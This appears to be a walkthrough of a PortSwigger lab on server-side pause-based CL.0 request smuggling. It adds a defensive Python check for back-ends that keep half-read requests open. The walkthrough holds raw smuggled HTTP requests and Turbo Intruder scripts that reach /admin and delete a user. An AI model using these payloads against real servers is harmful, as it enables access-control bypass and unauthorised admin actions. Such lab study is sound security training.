# Lab: Server-side pause-based request smuggling
# Description
This lab is vulnerable to server-side pause-based request smuggling. The front-end server streams requests to the back-end, and the back-end server does not close the connection after timing out on some endpoints.

To solve the lab, identify a pause-based CL.0 desync vector, smuggle a request to the back-end's /admin panel, and then delete the user carlos.

Note

For some pause-based server-side desync vulnerabilities, Burp's core tools are not sufficient to reach the goal. You must use the Turbo Intruder extension to complete this lab.

This lab is based on a real vulnerability discovered by PortSwigger Research. For more details, see "Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling".
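The defect named in the description is a back-end that keeps a half-read request open after its read timeout, so bytes from a later request can complete it. Added here as an illustration, not code from the original post or from the lab: a minimal hardened back-end in Python that closes the socket when the header deadline passes, together with the check a defender can run against a back-end to confirm it behaves that way. The loopback address, the deadline values and the unterminated request are constructed for the example.

```python
import socket
import threading
import time


def serve_one_request(listener, header_timeout):
    """Hardened back-end: read one request's headers under a deadline; close on timeout."""
    conn, _ = listener.accept()
    conn.settimeout(header_timeout)
    buf = b""
    try:
        while b"\r\n\r\n" not in buf:
            chunk = conn.recv(4096)
            if not chunk:                 # client gave up before finishing the headers
                return "client_closed"
            buf += chunk
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok")
        return "complete"
    except socket.timeout:
        return "timed_out_closed"         # deadline hit: the finally below closes the socket
    finally:
        conn.close()                      # never leave a half-read request waiting for more bytes


def probe_partial_request(port, pause):
    """Check: send an unterminated header block (constructed), wait, report whether the server closed."""
    s = socket.create_connection(("127.0.0.1", port))
    s.sendall(b"POST /login HTTP/1.1\r\nHost: localhost\r\n")   # no blank line: headers incomplete
    time.sleep(pause)
    s.settimeout(1.0)
    try:
        return s.recv(1) == b""           # b"" means FIN arrived: the server closed the connection
    except ConnectionResetError:
        return True
    except socket.timeout:
        return False                      # still open: a later request could complete this one
    finally:
        s.close()


def run_check(header_timeout, pause):
    listener = socket.create_server(("127.0.0.1", 0))            # ephemeral port on loopback
    outcome = []
    t = threading.Thread(target=lambda: outcome.append(serve_one_request(listener, header_timeout)))
    t.start()
    closed = probe_partial_request(listener.getsockname()[1], pause)
    t.join()
    listener.close()
    return outcome[0], closed             # (what the server saw, whether the client saw it close)


if __name__ == "__main__":
    print(run_check(header_timeout=0.3, pause=0.8))   # ('timed_out_closed', True)
```

A back-end with the defect described above would return `False` from the probe no matter how long the pause, because the connection stays open past the timeout.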
Lab (Expert): [Server-side pause-based request smuggling](https://portswigger.net/web-security/request-smuggling/browser/pause-based-desync/lab-server-side-pause-based-request-smuggling)
# Walkthrough
(Only screenshots for now; the text will be added when there is time.)

Click "ACCESS THE LAB" to enter the lab.

```http
POST /login HTTP/1.1
Host: ...
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

GET /404 HTTP/1.1
Foo: x
```
```python
# Find more example scripts at https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/default.py
# Turbo Intruder injects RequestEngine and table into the script's scope, so no imports are needed.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,    # one connection so the follow-up reuses it
                           requestsPerConnection=100,
                           pipeline=False
                           )
    for i in range(3, 8):
        # Send the request up to the header terminator, then pause 120 s before sending the rest
        engine.queue(target.req, pauseMarker=['\r\n\r\n'], pauseTime=120000)
        # Follow-up request sent on the same connection after the pause
        followUp = 'GET / HTTP/1.1\r\nHost: 0a3500d2042acb67804d3fa300950065.web-security-academy.net\r\n\r\n'
        engine.queue(followUp)


def handleResponse(req, interesting):
    table.add(req)
```
```http
...
GET /admin/ HTTP/1.1
Foo: x
```
```http
POST /login HTTP/1.1
Host: ...
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 66

GET /admin/ HTTP/1.1
Host: localhost
Content-Length: 75

x=y
```
```python
# Find more example scripts at https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/default.py
# Turbo Intruder injects RequestEngine and table into the script's scope, so no imports are needed.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=1,    # one connection so the follow-up reuses it
                           requestsPerConnection=100,
                           pipeline=False
                           )
    for i in range(3, 8):
        # Pause 66 bytes before the end of the request (the body length above), for 120 s
        engine.queue(target.req, pauseBefore=-66, pauseTime=120000)
        # Follow-up request sent on the same connection after the pause
        followUp = 'GET / HTTP/1.1\r\nHost: 0a3500d2042acb67804d3fa300950065.web-security-academy.net\r\n\r\n'
        engine.queue(followUp)


def handleResponse(req, interesting):
    table.add(req)
```
```
csrf=ryimjPkyidxq1TnsepMemdLIClik7GrB&username=carlos
```
```http
...
Content-Length: 129

POST /admin/delete/ HTTP/1.1
Host: localhost
Content-Length: 132

csrf=ryimjPkyidxq1TnsepMemdLIClik7GrB&username=carlos&x=y
```